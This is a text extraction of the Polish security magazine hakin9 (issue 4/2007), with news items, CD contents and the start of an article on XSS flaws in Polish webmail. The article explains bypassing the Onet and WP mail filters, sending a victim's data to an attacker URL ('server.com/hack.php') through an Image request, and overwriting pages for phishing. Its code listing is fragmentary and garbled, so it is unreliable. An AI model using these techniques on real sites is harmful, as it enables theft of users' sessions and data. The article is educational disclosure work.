plik

www.hakin9.org

hakin9 Nr 4/2007

hakin9

www.hakin9.org

hakin9 Nr 2/2006

W skrócie

Przedstawiamy garść najciekawszych wiadomości

ze świata bezpieczeństwa systemów informatycz-

nych i nie tylko

Zawartość CD

Prezentujemy zawartość i sposób działania najnow-

szej wersji naszej sztandarowej dystrybucji haki-

n9.live

Atak

Błędy w serwisach Onet i WP,

Allegro i mBank

Michał Majchrowicz

Michał przedstawia jak działają przykładowe sys-

temy zabezpieczenia przed XSS oraz jak można je

obejść.

Hak na Windows

Jacek Matulewski

Jacek pokazuje w jaki sposób korzystać z mechani-

zmu haków systemu Microsoft Windows, w szczegól-

ności w jaki sposób wykorzystać go do podsłuchiwa-

nia klawiatury.

Atak faktoryzacyjny na RSA

Daniel Lerch Hostalot

Daniel przybliża czytelnikom pojęcie RSA - bez wąt-

pienia najpopularniejszego systemu publicznej kryp-

tografii.Bezpieczeństwo tego popularnego algoryt-

mu jest oparte o trudności związane z faktoryzacją

dużych liczb, czyli tych, które mają ponad 100 cyfr w

zapisie dziesiętnym.

Obrona

Budowanie świadomości usprawnia

poziom bezpieczeństwa

Adam Kuczyński

Adam przedstawia istotę budowania świadomości

zagrożeń i ochrony informacji, a także techniki budo-

wania świadomości oraz sposoby ochrony przed

manipulacją.

Zapora systemu Windows Vista

– a złudne bezpieczeństwo systemu

Artur Żarski

Artur pragnie w swoim artykule pokazać konieczność

korzystania z firewall’i oraz zagrożenia wynikające z

braku jego posiadania.

Zazwyczaj bezpieczeństwo określane jest jako stan braku

zagrożenia, stan spokoju i pewności.

Dla każdego człowieka jest jedną z najważniejszych

spraw, dlatego tak wiele uwagi poświęca się temu zagadnie-

niu. Każdy człowiek pragnie czuć się bezpiecznie w domu,

na spacerze, kiedy surfuje po Internecie, a przede wszystkim

zależy nam na bezpieczeństwie naszych pieniędzy. Ostatni-

mi czasy bardzo głośnym tematem stało się wykrywanie luk

w największych portalach internetowych i bankach. Dlatego

zainteresowaliśmy się tymi wiadomościami. Motywem prze-

wodnim hakin9 4/2007 stały się hakowanie serwisów inter-

netowych, a głównym artykułem: Błędy w serwisach Onet

i WP, Allegro i mBank. Autor, Michał Majchrowicz w swoim

artykule uczula serwisy na podobne luki i wskazuje im wady

w celu poprawy podejścia do błędów typu JavaScript Imjec-

tion, XSS czy Session Fixation.

Udostępnimy Państwu także opinie na temat tego arty-

kułu jednego z omawianych portali.

Czasopismo zawiera znakomite artykuły oraz płytę

CD na której, będzie mozna znaleźć trzecią część CISCO

CCNA oraz dwa nowe tutoriale.

Katarzyna Juszczyńska

Sprostowanie

Oświadczamy, że błędy, które wkradły się do receznji ksią-

żek w numerze 2/2007 nie są winą autorów: Krystyny Wal i

Łukasza Długosza. Przepraszamy autorów oraz czytelników

za zaistniałą sytuację.

www.hakin9.org

hakin9 Nr 4/2007

hakin9

www.hakin9.org

hakin9 Nr 2/2006

Analiza ryzyka – System Zarządzania

Bezpieczeństwem Informacji

Tomasz Polaczek

Tomek chce przybliżyć pojęcie analizy ryzyka oraz

procesy związane z wdrażaniem sprawnego Systemu

Zarządzania Bezpieczeństwem Informacji.

Przegląd wybranych metod

niwelowania ograniczeń

sieci lokalnych

Konrad Malewski

Konrad w swoim artykule przedstawia jak przekiero-

wywać porty z wykorzystaniem urządzenia IGD oraz

jak stworzyć tunel IP wykorzystujący różne protokoły

wyższych warstw.

Metasploit – Exploiting framework

Michal Merta

Michal w swoim artykule odpowiada na pytania: czy

twój system jest dostatecznie zabezpieczony? Czy

chcesz się nauczyć używania prostego narzędzia, by

to stwierdzić?

Szyfrowanie w aplikacjach

– biblioteka Openssl

Paweł Maziarz

Paweł przedstawia garść informacji na temat jak

zaimplementować szyfrowanie SSL/TLS w swoich

aplikacjach.

Felieton

Niezdrowe trendy w bezpieczeństwie

– full disclosure

Patryk Krawaczyński

Klub Techniczny

GlobalTrust Enigma
Jak mniej czasu poświęcać

na administrowanie pocztą?

Księgozbiór

Szkoła Hakerów

Wojciech Trynkowski

Zapowiedzi

Zapowiedzi artykułów, które znajdą się w następnym

wydaniu naszego pisma.

jest wydawany przez Software–Wydawnictwo Sp. z o.o.
Dyrektor: Sylwia Pogroszewska sylwiap@software.com.pl

Redaktor naczelny: Martyna Żaczek

martyna.zaczek@software.com.pl

Asystent redaktora: Katarzyna Juszczyńska

katarzyna.juszczynska@software.com.pl

Tłumaczenie: Krzysztof Trynkiewicz

Wyróżnieni betatesterzy: Amadeusz Jasak, Łukasz Witczak, Rafał

Podsiadły

Opracowanie CD: Rafał Kwaśny

Kierownik produkcji: Marta Kurpiewska marta@software.com.pl

Skład i łamanie: Artur Wieczorek arturw@software.com.pl

Okładka: Agnieszka Marchocka

Dział reklamy: adv@software.com.pl

Prenumerata: Marzena Dmowska pren@software.com.pl

Adres korespondencyjny: Software–Wydawnictwo Sp. z o.o.,

ul. Bokserska 1, 02-682 Warszawa, Polska

Tel. +48 22 887 13 45, Fax +48 22 887 10 11

www.hakin9.org

Osoby zainteresowane współpracą prosimy o kontakt:

cooperation@software.com.pl

Jeżeli jesteś zainteresowany zakupem licencji na wydawanie naszych

pism prosimy o kontakt:

Monika Godlewska

e-mail: monikag@software.com.pl

tel.: +48 (22) 887 12 66

fax: +48 (22) 887 10 11

Druk: 101 Studio, Firma Tęgi

Redakcja dokłada wszelkich starań, by publikowane w piśmie i na

towarzyszących mu nośnikach informacje i programy były poprawne,

jednakże nie bierze odpowiedzialności za efekty wykorzystania ich;

nie gwarantuje także poprawnego działania programów shareware,

freeware i public domain.

Uszkodzone podczas wysyłki płyty wymienia redakcja.

Wszystkie znaki firmowe zawarte w piśmie są własnością odpowiednich

firm i zostały użyte wyłącznie w celach informacyjnych.

Do tworzenia wykresów i diagramów wykorzystano

program

firmy

Płytę CD dołączoną do magazynu przetestowano programem AntiVirenKit

firmy G DATA Software Sp. z o.o.

Redakcja używa systemu automatycznego składu

UWAGA!

Sprzedaż aktualnych lub archiwalnych numerów pisma w cenie innej

niż wydrukowana na okładce – bez zgody wydawcy – jest działaniem

na jego szkodę i skutkuje odpowiedzialnością sądowa.

hakin9 ukazuje się w następujących krajach: Hiszpanii, Argentynie,

Portugalii, Francji, Belgii, Luksemburgu, Kanadzie, Maroko, Niem-

czech, Austrii, Szwajcarii, Polsce, Czechach, Słowacji.

Prowadzimy również sprzedaż kioskową w innych krajach europej-

skich.

Magazyn hakin9 wydawany jest w 7 wersjach językowych:

CZ EN

IT FR DE

Nakład wersji polskiej 6 000 egz.

UWAGA!

Techniki prezentowane w artykułach mogą być używane jedynie
we własnych sieciach lokalnych.
Redakcja nie ponosi odpowiedzialności za niewłaściwe użycie
prezentowanych technik ani spowodowaną tym utratę danych.

W skrócie

hakin9 Nr 4/2007

www.hakin9.org

W skrócie

www.hakin9.org

hakin9 Nr 4/2007

Uwaga na oszustów poda-

jących się za Microsoft

Zwykli szarzy śmiertelnicy korzysta-

jący z oprogramowania Microsoft

mogą czuć się bezpieczni. Ostatnie

pogłoski, które docierały do normal-

nych ludzi, że pracownicy Microso-

ftu szukają po domach nielegalnych

programów to tylko plotka. Wszyst-

kie takie poczynania nie są inicjaty-

wą Microsoftu..

Firma pragnie ostrzec przed wpusz-

czaniem do prywatnych mieszkań

osób podszywających się pod firmę

Microsoft i proszą o jakie kolwiek

kontakt w tej sprawie, jeśli sytuacja

taka miała miejsce.

Rozwój Samsung

Electronics

Prawie 2 mld USD ma być przezna-

czone na produkcję modułów pamięci

DRAM w Korei Południowej. A wszyst-

ko to po to aby zwiększyć roczną pro-

dukcję o 90%. Natomiast ma także

wzrosnąć rozwój technologii modu-

łów pamięci DRAM poprzez zwięk-

szenie się pojemności kości pamięci

o 30%. Samsung Electronic jest opty-

mistą, jak twierdzi pomimo niewielkie-

go zysku jaki będzie w pierwszej poło-

wie 2007, wzrost sprzedaży modułów

wzrośnie o 11 procent (w trzecim i

czwartym kwartale).

Luki w gadu-gadu

Wykrywanie luk ostatnimi czasu

stało się bardzo modne. Tym razem

pod lupę poszedł najpopularniejszy

polski komunikator Gadu-Gadu. Po

poinformowaniu odpowiednich osób

o lukach nie podjęto żadnych kroków

w celu załatania ich. Jak się okazu-

ję firma Gadu-Gadu nie otrzymała

żadnej wiadomości, ponieważ mail

jest na liście hostów DSBL i został

odrzucony. Jednak kiedy skontakto-

wano sie z firmą za pomocą komu-

nikatora bardzo szybko zajęto się tą

sprawą w celu uniknięcia niebezpie-

czeństwa na jakie zostali narażeni

użytkownicy komunikatora.

Pierwsza luka znajdowała się w

pliku Management.cpp. Luka naru-

szała pamięć komunikatora co powo-

dowało niepoprawne zamknęcie apli-

kacji. Następna luka nie pozwala na

zdalne wykonanie kodu. Objawia się

to poprzez niemożność zamknięcia

w momencie kiedy jest otwarte okien-

ko zmiana topicu. Może to doprowa-

dzić do uszczerbku w pamięci. Kolej-

na luka, która została wykryta pozwa-

la na atak: denial of service na aplika-

cję Gadu-Gadu.

Laptop dla osób trendy

risto Slim 430 Specjal Orange
edition to raj dla osób, którzy

cenią sobie oryginalny wygląd i swoim
sprzętem chcą się wyróźnić z tłumu.
Charakterystyczną cechą komputera
jest biała klawiatura i jaskrawopoma-
rańczowa pokrywa matrycy.

Zalety:

• panoramiczny wyświetlacz Glare

oparty  na  najnowszej  platfor-
mie  mobilnej  Intel  Centrino  Duo
z  dwurdzeniowym  procesorem
Intel Core 2 Duo.

•   nagrywarka DVDRW
•   sieć bezprzewodowa WiFi
•   waży 2 kg.

Wszystkie  te  zalety  prowadzą  do
łatwiejszego i szybszego użytkowania
laptopa,  w  jednym  czasie  jest  możli-
wość odtwarzania obrazu wideo, roz-
mowy  internetowej,  nagrywania  płyt
DVD  bez  ubytku  płynności  innych
uruchomionych  aplikacji.

Dość lekki komputer może z łatwo-

ścią być transportowany w najciekaw-
sze zakątki świata, a sześcioognio-
wa bateria, która zawiera technologie

oszczedzania baterii pozwala na długi
czas korzystania z urządzenia.

Panoramiczny 13-calowy panel

LCD  jest  o  rozdzielczości  WXGA
1280x800  pikseli  i  daje  możliwość
pracy na aplikacjach biurowych i mul-
timedialnych. Oglądanie filmów DVD
jest  ogromną  przyjemnością  dzięki
eliminacji  czarnych  pasów  na  górze
i  na  dole  oraz  dzięki  bardzo  żywym
i  nasyconym  kolorom.  Nagrywarka
umożliwia nagrywanie nawet 8,5 GB
na jednej płycie DVD.

Aristo Slim 430 Specjal Orange

edition posiada modem, kartę siecio-
wą GigaLAN oraz kartę sieci bezprze-
wodowej  Wireless  LAN  802.11ABG
54Mbps.  Jest  także  wyposażony  w
mikrofon  i  głośniki.  Notebook  jest
objęty  gwarancją  24-miesięczną
w  systemie  DOOR-TO-DOOR,  co
wiąże się z darmowym transportem)

Specjalna edycja Aristo Slim

430 jest kierowana do wąskiej grupy
osób  ponieważ  na  rynek  trafi  tylko
200  egzemplarzy.  Przede  wszyst-
kim  odbiorcami  mają  być  pracowni-
cy  agencji  reklamowych,  dziennika-
rze, artyści, osoby kreatywne.

Wyczyszczone konta banku Nordea

ank Nordea należy do najwięk-
szej skandynawskiej grupy

finansowej  Nordea.  Bank  świadczy
usługi bankowe przez Internet, tele-
fon, poprzez usługę sms, WAP oraz
sieć  oddziałów.  Bankowość  elek-
troniczna  działa  na  zasadzie  syste-
mu  Solo-wielokrotnie  nagradzane-
go  za  sukcesy  w  bankowości  elek-
tronicznej  dokonywanej  przez  Inter-
net.  Obsługuje  klientów  indywidual-
nych i biznesowych. Oferta banku to
między innymi: konto Nordea, rachu-
nek e-firma, e-firma plus, atrakcyjne
lokaty, niskooprocentowane kredyty.

Codziennie szwedzka policja

dostaje  kilka  zgłoszeń  dotyczących
braku  pieniędzy  na  kontach  klien-
tów  banku  Nordea.  Straty  szacuje
się na kwotę 8 milionów koron. Inter-
netowi złodzieje używają do kradzie-

ży  linków,  które  przesyłają  klien-
tom  banku  w  mailach,  do  tego  celu
został  stworzony  specjalny  wirus.
Uaktywnia się on w momencie wpi-
sania  przez  użytkownika  kodu  słu-
żącego  do  jakichkolwiek  działań  na
koncie.  W  momencie  kiedy  dosta-
je  e-mail  są  wykradane  dane  klien-
ta  i  przekazywane  złodziejom,  a  ci
dokonują kradzieży poprzez przelew
na  swoje  konta.  Jak  donosi  policja
wkradające  się  na  konta  osoby  są
tylko  pośrednikami  zorganizowane-
go  gangu.  Podejrzewają  że  wszyst-
ko zaczyna się w Rosji i dalsze dzia-
łania odbywają się za pomocą ame-
rykańskich  serwerów.  Policja  moni-
toruje poczynania 125 osób związa-
nych z tą sprawą jednak na razie nie
mają konkretnych tropów.

W skrócie

hakin9 Nr 4/2007

www.hakin9.org

W skrócie

www.hakin9.org

hakin9 Nr 4/2007

Nielegalny Windows

Od lipca 2005 roku są zbierane dane

dotyczące nielegalnego oprogramo-

wania Windows XP. Dane są niepo-

kojące. Z 512 milionów procesów

sprawdzających około 22 procent

z nich zakończyła się negatywnie,

czyli systemy były nielegalne. Pro-

cedura ta doprowadziła do tego, że

56 tysięcy użytkowników wymieniło

bezpłatnie nielegalną kopię na praw-

dziwy odpowiednik. Poziom świato-

wego piractwa jest szacowany na

poziomie około 35 procent.

Pomysły hakerów

Nie ma to jak dopasowanie się do

otoczenia i do tego co dzieje się

wokół nas. Ostatnio panujące silne

wiatry to nie tylko klęska dla miesz-

kańców, którzy ucierpieli podczas

wichury, jak się okazuje dotknęła ona

również internautów, którzy otworzyli

mail informujący o tej anomalii pogo-

dowej i jej ofiarach. Zainteresowani

tą wiadomością użytkownicy Inter-

netu oprócz wiadomości otrzymy-

wali złośliwe oprogramowanie, które

mogło zainfekować niezabezpieczo-

ny komputer.

Wirus-Small.DAM jest załączo-

ny do wiadomości zatytułowanych:

„230 dead as storm batters Europe”

oraz „British Muslims Genocide”

and „U.S. Secretary of State Con-

doleezza”

W momencie przeglądu wiado-

mości i załącznika komputer zosta-

je zaatakowany przez konia trojań-

skiego i instaluje się na kompute-

rze. Większość firm antywiruso-

wych klasyfikuje Wirus-Small.DAM

do kategorii niegroźnej. Jednak

należy uważać ponieważ zaczy-

nają się pojawiać różne odmiany

wykrytego trojana i ostrożnie otwie-

rać maile pochodzące z niezidenty-

fikowanego źródła.

Taka sytuacja miała już kiedyś

miejsce kiedy to hakerzy wykorzy-

stali Huragan Katrina, który nawie-

dził południowe stany USA. W 2005

roku wykryto zwiększone ataki na

komputery wynikłe z kliknięcia na

mail z załącznikiem z wiadomościa-

mi z tego wydarzenia.

Zagrożenie botnetami

odczas Światowego Forum Eko-
nomicznego Vint Cerf, twórca

stosu protokołów TCP/IP, wyraził
opinię, że Sieci zagrażają botnety.

Botnety to sieci komputerów-

zombie,  czyli  maszyn  które  bez
wiedzy  właściciela  są  kontrolowa-
ne  przez  cyberprzestępców.  Sieci
takie wykorzystywane są do rozsyła-
nia  spamu,  szkodliwego  oprogramo-
wania  oraz  przeprowadzania  ataków
typu DDoS. Takie poczynania w ostat-
nim czasie stały się groźną bronią w
rękach  przestępców  wymuszających
haracze za odstąpienie od ataku (co
w przypadku firm zależnych od połą-
czenia sieciowego jak np. portale czy
sklepy  internetowe  stanowi  niemałe
zagrożenie).  Całkowitą  liczbę  kom-
puterów  zombie  na  świecie  szacu-
je  się  na  kilka  milionów  -  nie  można
jej dokładnie określić, ponieważ stale
rośnie.

Za stworzenie botnetu został ska-

zany na 37 miesięcy pozbawienia wol-
ności dwudziestojednoletni Christo-
pher Maxwell, który zainfekował około

50 tys. komputerów (szkolnych, woj-
skowych oraz należących do szpitala).
Pod wpływem działania botnetu mają-
cego na celu instalowanie oprogramo-
wania adware padł m.in. system szpi-
tala w Seattle.

Zdaniem Cerfa aż 150 milionów

komputerów na świecie jest zarażo-
nych i stanowi część botnetu. Ozna-
czałoby to, że zarażony jest co czwar-
ty komputer podłączony do Sieci.

Specjaliści potwierdzają obawy

Cerfa,  a  niedawno  mogli  obserwo-
wać tworzenie i pracę botneta Spam
Thru. Twórcy tego botneta wyposaży-
li  go  w  oprogramowanie  antywiruso-
we, które chroniło  przed innymi bot-
netami,  okazało  się  również,  że  jest
on  dziesięciokrotnie  bardziej  wydaj-
ny  od  konkurencji,  a  przy  tym  trud-
niej go wykryć. Spam Thru to był jedy-
nie test, który zapowiada to, co czeka
nas  w  przyszłości.  Botnety  rozwija-
ją  się  w  zastraszającym  tempie,  są
bardzo  zaawansowane  technologicz-
nie, mniejsze, trudniejsze do wykrycia
i bardziej wydajne niż dotychczas.

Windows Vista

indows Vista będzie dostępny w
siedmiu odmianach. Starter Edi-

tion jest przeznaczona dla rynków ubo-
gich. Program ten nie będzie nadawał
się do gier jedynie do obsługi podsta-
wowych sieci TCP/IP. Home Basic Edi-
tion przeznaczona jest dla społeczno-
ści,  która  korzysta  XP  Home.  Home
Premium  Edition  wyposażony  jest  w
Media  Center.  Jest  to  wersja  droż-
sza, ale bardziej przydatna niż wersja
Basic.  Vista  Profesional,  Small  Busi-
ness  Edition,  Enterprise  Edition  to
wersje  przeznaczone  dla  firm.  Posia-
dają przydatne dla firm narzędzia. Ulti-
mate Edition gromadzi najlepsze funk-
cje z wersji Home i Proffesional. Do tej
pory można było zainstalować wersję
Upgrade  Windows  Vista  na  kompu-
terze,  który  nie  posiadał  poprzedniej
wersji  Okienek.  Był  łatwy  w  użyciu,
gdyż wystarczyło włożyć płytę instala-
cyjną do napędu. Program rozpoczynał
swoją pracę. Jednak to uległo zmianie

instalacja będzie możliwa jedynie na
komputerach, gdzie zainstalowany jest
system Windows 2000 lub XP.

Biorąc pod uwagę wygodę użyt-

kowników to nie będą oni zachwyceni
zaistniałą sytuacją. Jednak Microsoft
podaje dwa rozwiązania, po pierwsze
zawsze może użytkownik zainstalować
sobie Windows 2000 lub XP, a następ-
nie Viste. Drugim pomysłem firmy jest
wykupienie sobie klucza, który pozwoli
na instalację na pustym dysku.

Informujemy, że w nocy z 29 na 30

stycznia odbyła się transmisja na żywo
z oficjalnej premiery systemu Windows
Vista  i  pakietu  Office  System  2007.
Swoją obecnością zaszczycił sam Bill
Gates.  Miała  ona  miejsce  w  Nowym
Jorku  na  Times  Square.  Jak  wiado-
mo  przed  komputerami  aby  obejrzeć
to  wydarzenie  zasiadło  spore  rzesze
internautów, a ci co nie dane im było
zobaczyć tej gali z pewnością bardzo
żałują.

hakin9.live

hakin9 Nr 4/2007

www.hakin9.org

a dołączonej do pisma płycie znajduje się haki-
n9.live (h9l) w wersji 3.1-aur – bootowalna dystry-
bucja Auroxa, zawierająca przydatne narzędzia,

dokumentację, tutoriale i materiały dodatkowe do artyku-
łów. Aby zacząć pracę z hakin9.live, wystarczy urucho-
mić komputer z CD1. Po uruchomieniu systemu możemy
zalogować się jako użytkownik hakin9 bez podawania ha-
sła. Materiały dodatkowe zostały umieszczone w nastę-
pujących katalogach:

•   tutoriale – 28 tutoriali;
•   Aurox-Live;
•   materiał  uzupełniający  do  artykułu  “Hak  na  Win-

dows”

programy:

•   NetConceal Anonymizer;
•   NetConceal AntiHistory;
•   MicroWorld eScan Internet Security Suite;
•   Enigma lite desktop edition;
•   Comodo personal firewall;
•   Cisco - Kurs na certyfikat Cisco CCNA cz. III

Materiały archiwalne zostały umieszczone w podkata-
logach _arch. W przypadku przeglądania płyty z pozio-
mu uruchomionego hakin9.live powyższa struktura jest
dostępna z podkatalogu /mnt/cdrom. Wersję hakin9.live
3.1-aur zbudowaliśmy, opierając się o dystrybucję Aurox i
skrypty automatycznej generacji (www.aurox.org/pl/live).

Tutoriale i dokumentacja

W skład dokumentacji, oprócz standardowych dla Linuk-
sa stron pomocy (stron manualna), z których skorzystać
możemy  poprzez  konsolę  wydając  polecenie  man  [na-
zwa programu], wchodzą między innymi tutoriale, przy-
gotowane  przez  redakcję.  Na  CD  opracowane  zostały
praktyczne  ćwiczenia  do  jendego  artykułu  –  “Atak  fak-
toryzacyjny na RSA”, który można przeczytać w piśmie.
Zakładamy,  że  podczas  wykonywania  ćwiczeń  związa-
nych z artykułami i tutorialami, użytkownik korzysta z ha-
kin9.live. Na płycie znajdzie się również tutorial do arty-
kułu  z  poprzedniego  Hakin9-  “Czy  moje  konto  php  jest
bezpieczne?” A także materiały pomocnicze do artykułu
“Hak na Windows” Jacka Matulewskiego.

NetConceal Anonymizer

Służy do ukrywania adresu IP powodując, że użytkownik
staje się anonimowy, podczas kiedy Internet jest aktyw-
ny i podczas surfowania w sieci. Aplikacja daje gwaran-

Zawartość CD

cje ochrony prywatności i bezpieczeństwa. Program uru-
chamia się automatycznie.

NetConceal AntiHistory

Program służy do kasowanie historii i śladów obecności
użytkownika. Czyści strony internetowe, pliki, dokumen-
ty, listy oraz wiele niebezpiecznych znaków dotyczących
obecności. Łatwy w użyciu: wystarczy wybrać “instaluj” i
kliknąć “start”

Obsługuje systemy i aplikacje:
-Internet Explorer
-Windows
-P2P
-Windows Media Player, RealPlayer
-Microsoft Office
-Instant Messengers (MSN, ICQ)
-WinRAR, WinZip

eScan Internet Security Suite

Program antywirusowy służy do zabezpieczenia kom-
putera oparty na własnym silniku skanującym. W ofercie
programu jest kontrola rodzicielska, filtr okienek, wyska-
kujących, filtr pocztowy, który zapobiega niechcianej po-
czcie, automatyczne aktualizacje, zarządzanie prywatno-
ścią, NetBIOS Firewall

Enigma lite desktop edition

Jest rozwiązaniem opracowanym dla systemu operacyj-
nego Microsoft. Komponenty Desktop Document Secu-
rity integrują się z klientem systemu operacyjnego Win-
dows i komponentami oprogramowania serwera zainsta-
lowanego na MS Windows. Używa najbardziej zaawan-
sowanych mechanizmów kryptografii, jest kompatybilny
ze standardami X509 i SSL v 3.0. Zezwala na użycie cy-
frowych certyfikatów i identyfikatorów. Kompatybilny jest
również z CAC i PKCS#11

Comodo personal firewall

Program służący do ochrony komputera przed wewnętrz-
nymi zagrożeniami-konie trojańskie, oprogramowanie
spyware, robaki różnego rodzaju. Jest bardzo łatwy w
użytkowaniu i nawet nowicjusze nie będą mieli z nim pro-
blemów.

Kurs na certyfikat Cisco CCNA cz. III

Certyfikat CCNA przeznaczony jest dla specjalistów od
niewielkich sieci (do 100 stanowisk) i potwierdza umiejęt-
ności w zakresie instalacji i konfiguracji routerów i prze-
łączników Cisco w sieciach LAN i WAN (poprawa wydaj-
ności i bezpieczeństwa sieci oraz usuwanie problemów).

Jeśli nie możesz odczytać zawartości płyty CD, a nie jest ona uszkodzona mechanicznie,

sprawdź ją na co najmniej dwóch napędach CD.

W razie problemów z płytą, proszę napisać pod adres: cd@software.com.pl

www.hakin9.org

hakin9 Nr 4/2007

Atak

ażdego dnia z usług Onetu i WP korzy-
sta rzesza ludzi. Oczywistą jest więc
sprawą, iż w takiej sytuacji serwisy te

powinny w szczególny sposób zadbać o kwe-
stię zabezpieczeń, gdyż ewentualna luka mo-
że być katastrofalna w skutkach dla użytkow-
nika serwisu.

Możliwości, jakie daje XSS

W dzisiejszych czasach jesteśmy przyzwycza-
jeni do efektów graficznych na stronach www.
Dzięki  zastosowaniu  DOM,  CSS  i  JavaScript
programiści witryn są w stanie sprawić, iż sta-
tyczny tekst przemienia się w tętniącą życiem
stronę. Niewielu typowych użytkowników zda-
je  sobie  sprawę,  że  te  techniki,  pozwalające
na fajerwerki i bogatą kolorystykę, mogą rów-
nież zostać użyte przeciwko nim. Jeśli ataku-
jący może w jakikolwiek sposób wstrzyknąć w
treść  strony  kod  skryptu,  ma  wówczas  szero-
kie pole do popisu. Zazwyczaj kod jest jednak
ograniczony na przykład długością, lub zesta-
wem dostępnych znaków. Aby ominąć te ogra-
niczenia używa się bardziej rozwiniętej formy,
czyli Cross Site Scripting (XSS). Polega ona na
dodaniu do treści strony jedynie odwołania do
zewnętrznego skryptu, na który nie są już na-

łożone żadne ograniczenia. Dzięki temu może-
my napisać długi kod, który będzie w stanie wy-
konać bardzo skomplikowane zadania, jak ko-
piowanie danych prywatnych użytkownika, czy
przejmowanie sesji. Do tego celu najlepiej na-
daje się obiekt XMLHttpRequest. Pozwala on
na wykonanie przez JavaScript zapytania http.
Okazuje się to dla nas bardzo użyteczne, po-
nieważ nasz skrypt działa w kontekście zalo-
gowanego użytkownika i ma takie same prawa,
co on. Spójrzmy na przykładowy kod zamiesz-
czony w Listingu 1.

W tym skrypcie sprawdzamy czy, jest do-

stępny obiekt XMLHttpRequest. Jeśli tak, two-
rzymy jego instancję. Następnie wysyłamy po-
lecenie GET jednocześnie zaznaczając, iż nie

Błędy w serwisach

Onet i WP, Allegro i mBank

Michał Majchrowicz

stopień trudności

W Polsce podejście do błędów typu JavaScript Injection, XSS,

Session Fixation, RCSR, itp. jest mniej poważne, niż być powinno.

Podczas swoich testów natknąłem się na błędy w wielu serwisach

internetowych. Niektóre są większe, inne mniejsze. W pierwszej

części tego artykułu chciałbym się skupić na lukach wykrytych

w dwóch największych polskich portalach.

Z artykułu dowiesz się...

• Jak działają przykładowe systemy zabezpiecza-

nia przed XSS oraz jak można je obejść.

Co powinieneś wiedzieć...

• Jak działają luki XSS i JavaScript Injection oraz

jakie niosą ze sobą ryzyko.

Błędy w popularnych serwisach internetowych

hakin9 Nr 4/2007

www.hakin9.org

czekamy na jego zakończenie. Nie-
stety  obiekt  XMLHttpRequest  ma
swoje  ograniczenia.  Z  powodu  bez-
pieczeństwa  nie  możemy  wywołać
zapytania  z  jednej  domeny  do  dru-
giej. Na przykład: jeśli nasz kod zo-
stanie uruchomiony na domenie se-
rver.com,  to  nie  możemy  przesłać
zdobytych  w  ten  sposób  danych  do
naszego  serwera  operującego  pod
adresem  server2.com.  Nie  należy
jednak zbytnio ufać temu zabezpie-
czeniu. Jak się okazuje, nadal może-
my tworzyć zapytania do innych do-
men, wysyłać dane, tyle że bez moż-
liwości  odebrania  odpowiedzi.  Aku-
rat  w  naszym  przypadku  nie  jest  to
niezbędne.  Zmodyfikowany  kod  po-
zwalający  na  odwołania  pomiędzy
domenami zobaczymy na Listingu 2.

Tworzymy tutaj nowy obiekt

Image  i  jako  jego  źródło  podajemy
nasz  url.  Dzięki  temu  przeglądarka
wykona nasze polecenie przy próbie
załadowania  obrazka.  Zarówno  do
funkcji  SendRequest,  jak  i  SendRe-
quest2  odwołujemy  się  w  ten  sam
sposób.  Jako  parametr  podajemy
adres url wraz z nazwą skryptu oraz
zmienne i ich wartości, jakie chcemy
w  ten  sposób  przekazać  (np.  Sen-

dRequest,

http://www.server.com/

hack.php?var1=val1)).  Korzystając
z  obiektu  XMLHttpRequest  możemy
pobrać  dowolne  dane  z  podatnego
serwisu, a następnie informacje zdo-
byte w ten sposób przesłać do dowol-
nego  miejsca  w  sieci  dzięki  funkcji
SendRequest2.  Możliwości  tej  tech-
niki  dla  atakującego  są  niezliczone.
Możemy  sobie  wyobrazić  sytuację,
w której odpowiednio skonstruowany
skrypt  prześle  wszystkie  dostępne
dane  Oczywiście  nic  nas  też  nie
ogranicza  w  próbach  zmiany  treści
strony. Spójrzmy na przykład na kod
zamieszczony w Listingu 3.

Po upływie 100ms, czyli czasu

niezauważalnego  dla  człowieka,
zostanie  wykasowany  cały  kod  wi-
tryny, a w jego miejsce umieszczony
zostanie znacznik iframe, wskazujący
na dowolną stronę. Jest to wręcz ide-
alna technika dla wszelkiego rodzaju
ataków  phishingowych.  Użytkownik
spoglądając  na  pasek  adresowy
przeglądarki  będzie  przekonany,  że

nadal znajduje się na właściwiej do-
menie, podczas gdy wszelkie jego
zachowania mogą być już śledzone.

Poczta Onet i WP

Podczas  analizy  systemu  zabez-
pieczania  treści  maili,  odbieranych
przez internautów, którzy korzystają
z usług Onetu i WP, zauważyłem, że
możliwe jest dodanie do treści maila
kodu JavaScript, który zostanie uru-
chomiony  na  komputerze  odbiorcy
odpowiednio  spreparowanej  wia-
domości.  Odkryte  przeze  mnie  luki
w skryptach filtrujących miały różny
charakter.  Czasami  chodziło  o  omi-
janie przez system filtracyjny części
kodu, innym razem o przetwarzanie
białych  znaków,  na  które  przeglą-
darki  nie  zwracają  uwagi.  W  tym
tekście  chciałbym  jednak,  w  celach
edukacyjnych, skupić się na jednym
konkretnym przykładzie, gdyż jest on
uniwersalny dla obu serwisów.

W przypadku Onetu mamy do czy-

nienia z bardzo rygorystycznym syste-
mem.  Wszelkiego  rodzaju  podejrza-
ne  znaczniki  są  albo  usuwane,  albo
zastępowane  przez  div-y.  Można  by
tu  polemizować,  czy  aż  taki  poziom
zabezpieczeń  jest  konieczny,  ale  nie
można kwestionować tego, iż na pew-
no  jest  skuteczny.  Onet  popełnił  jed-
nak jeden błąd. Mianowicie zawartość
załącznika html, wyświetlanego za po-
mocą funkcji pokaż nie jest tak dobrze
oczyszczana, a co za tym idzie, moż-
liwe jest wstrzyknięcie naszego kodu.
W  przypadku  Wirtualnej  Polski  ma-
my do czynienia z innym podejściem.
Skanuje  ona  w  ten  sam  sposób  za-
równo  treść  maila,  jak  i  załączniki
html. Sposób skanowania jest jednak
mniej restrykcyjny. Spójrzmy na przy-
kład, jak są filtrowane znaczniki posia-
dające atrybuty src lub href. Otóż, nie
zezwala się w mailu na obecność od-
wołań do zewnętrznych serwisów. Je-
śli  zatem  odwołamy  się,  np.  do  ser-

wera  http://server.com,  nasz  text  zo-
stanie poprzedzony przez x. Jak wie-
my, żadna przeglądarka nie obsługu-
je protokołu xhttp, xftp, xhtpps, itp. Po
wykryciu  któregokolwiek  z  wyżej  wy-
mienionych atrybutów dokonywane są
opisywane  zmiany,  a  użytkownik  jest
pytany, czy dane treści mają być od-
blokowane, czyli przywrócone do sta-
nu pierwotnego. Informuje się go rów-
nież,  że  może  to  stanowić  dla  niego
zagrożenie.  To  podejście  ma  jedną

Listing 1.

Kod korzystający

z XMLHttpRequest,

lang=JavaScript

var

req

;

function

SendRequest

(

url

)

{

req

)

{

(

window

XMLHttpRequest

)

{

try

{

req

new

XMLHttpRequest

();

}

